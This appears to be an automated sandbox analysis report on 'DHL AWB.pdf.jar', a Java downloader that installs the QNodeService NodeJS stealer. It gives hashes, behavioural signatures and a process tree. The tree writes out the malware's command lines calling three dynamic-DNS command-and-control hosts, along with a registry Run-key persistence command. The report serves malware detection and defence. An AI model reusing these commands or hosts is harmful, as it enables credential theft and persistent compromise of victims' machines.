Analysis
-
max time kernel
136s -
max time network
149s -
platform
windows10_x64 -
resource
win10 -
submitted
26-06-2020 06:07
Static task
static1
Behavioral task
behavioral1
Sample
DHL AWB.pdf.jar
Resource
win7
Behavioral task
behavioral2
Sample
DHL AWB.pdf.jar
Resource
win10
General
-
Target
DHL AWB.pdf.jar
-
Size
12KB
-
MD5
8884e6fdb451ba445b40b41d99cfc162
-
SHA1
fa3ec63c146dd38cd98b9f478bb26c9028ff36cf
-
SHA256
732389d36893f1f46024d4a4fecc3881f1d913818a34b676782115ab89023697
-
SHA512
c59ed8982e490314604c81f062dcccf6d8bc529ecad5bb03acdadfc0690f8f8e9aa3f9e5eb3e92f3af8998224e65d3c3045bfdf21cca86de35a34a1bbf16eddb
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfca-116.dat family_qnodeservice -
Executes dropped EXE 2 IoCs
pid Process 632 node.exe 1104 node.exe -
Loads dropped DLL 4 IoCs
pid Process 1104 node.exe 1104 node.exe 1104 node.exe 1104 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-16ca9dcf = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-16ca9dcf.cmd\"" reg.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001ad89-114.dat js behavioral2/files/0x000100000001ad89-120.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 wtfismyip.com 11 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1104 node.exe 1104 node.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3832 wrote to memory of 632 3832 java.exe 68 PID 3832 wrote to memory of 632 3832 java.exe 68 PID 632 wrote to memory of 1000 632 node.exe 69 PID 632 wrote to memory of 1000 632 node.exe 69 PID 1000 wrote to memory of 852 1000 cmd.exe 70 PID 1000 wrote to memory of 852 1000 cmd.exe 70 PID 632 wrote to memory of 1104 632 node.exe 71 PID 632 wrote to memory of 1104 632 node.exe 71
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL AWB.pdf.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://nax1.spdns.org --central-base-url https://nax1.duckdns.org --central-base-url https://nax1.theworkpc.com2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-16ca9dcf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-16ca9dcf.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-16ca9dcf" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-16ca9dcf.cmd\""4⤵
- Adds Run key to start application
PID:852
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://nax1.spdns.org --central-base-url https://nax1.duckdns.org --central-base-url https://nax1.theworkpc.com3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1104
-
-